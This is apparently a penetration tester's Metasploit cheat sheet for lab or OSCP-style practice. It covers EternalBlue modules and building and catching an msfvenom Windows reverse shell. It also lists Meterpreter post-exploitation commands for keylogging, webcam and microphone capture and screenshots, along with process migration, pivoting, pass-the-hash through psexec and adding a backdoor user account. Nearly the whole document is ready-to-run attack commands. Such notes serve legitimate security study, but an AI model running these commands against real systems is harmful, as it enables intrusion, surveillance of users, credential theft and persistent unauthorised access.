# Metasploit ## REF: * [Windows CMD Kung Fu](https://pentest.mxhx.org/07-win-privesc/windows-cmd-kungfu) * [Veil Evasion](https://pentest.mxhx.org/03-getting-in/03-veil) ## Metasploit Framework ``` msfsearch whatever msfconcole search Nostromo use exploit/multi/http/nostromo_code_exec show options Format: Exploit/Payload/Auxiliary/PostModules ``` ## Eternal Blue ``` ms08_067_netapi.rb .. eternal blue - messy, memory, could crash system .. get out of this as soon as you can and use psexec ms17_010_psexec.rb ..eternal blue - friendly version .. sends a file, authenticates nicely, runs that file as service .. Pentesters Pledge!! ``` ## Venom * [FtpHttpVulnWebshell](https://pentest.mxhx.org/ftp#ftphttp-vulnerability) ``` msfvenom -l | grep windows msfvenom --list encoders msfvenom --list format msfvenom --list payloads | grep java msfvenom --help-formats msfvenom -p windows/shell/reverse_tcp LHOST=10.10.X.X LPORT=8080 -f exe > /tmp/file.exe python3 -m http.server ..share with python (optional) ``` * Silly Windows Powershell "Hello": * Create "hi.exe" * Opens Windows Powershell * Prints "Hello World" ``` msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"Write-Output 'Hello World'\"; pause" -f exe > hi.exe ``` ## Listener ``` > sudo msfconsole show exploits excellent - Works!!!!! great - Might Work good - Blah average - Blah low - Blah manual - Blah use exploit/multi/handler set PAYLOAD windows/shell/reverse_tcp ..same as venom show options set LPORT 8080 ..same as venom/incoming set LHOST 0.0.0.0 ..any exploit -j ..job to background ``` ## Sessions ``` Ctr-C ..kill session you are in jobs ..jobs listening sessions -h ..help sessions -K ..Kill all sessions sessions -l ..list sessions -i 1 ..interact ``` ## Shell ``` (no autocomplete) whoami netstat -na tasklist cd c:\ dir ipconfig ipconfig /displaydns net user net user bob Password1 /add ``` ## PrivEsc ``` getuid .. www use priv .. loading privesc getsystem .. grab system acct getuid .. system ``` ## Meterpreter ``` ? ..help cd ..change dir lcd ..local cd pwd ls cat download mkdir edit ..dont trust this though sysinfo shutdown reboot reg ..registry shell ..go to the 'normal shell' exit kill execute screenshot -p my.jpg screenshot -p /tmp/screen.jpg idletime uictl [enable/disable] [keyboard/mouse] webcam_list webcam_snap record_mic keyscan_start ..keylogging keyscan_dump ..view keyscan_stop (Could force putty to crash, and capture their login!) ``` ## Migrate ``` getuid ..userid getpid ..2952 ps ..process list ps -h ..process list (help) ps -S notepad ..search for notepad migrate 3996 ..migrate into notepad getpid ..3996 ``` ## Looking Around ``` mtp > run post/windows/gather/win_privs cd\ & dir /b /s proof.txt type c:\pathto\proof.txt ``` ## Pivot ``` use exploit1 set RHOST victim1 set PAYLOAD xyz exploit mtp> ctrl-z or background msf> route add victim2subnet netmask sid use exploit2 set RHOST victim2 set PAYLOAD xyz exploit Did not try this one: MTP> portfwd add -l 5555 -p 22 -r Target2 ``` ## Pass the Hash * Pass the HASH to Metasploit * Must come from: system, ram, sam-db, ntds.dit * Not sniffed from the network (diff salts) * Note: Patch in 2014 Local account is now disabled over network ``` Pass the HASH to metasploit: Must come from: system, ram, sam-db, ntds.dit Not sniffed from the network (diff salts) Note: Patch in 2014 Local account is now disabled over network msfconsole msf> use exploit/windows/smb/psexec msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> show options msf> set RHOSTS 10.10.10.10 msf> set LHOSTS 10.10.x.x msf> set smbuser monk msf> set smbpass LMHASHXXX:NTHASHXXX msf> exploit ..error: Exploit failed ActiveRecord msf> db_disconnect ..fix the bug in metasploit msf> exploit ..win! getuid getpid ifconfig shell net user net user bob Password1 /add ``` ##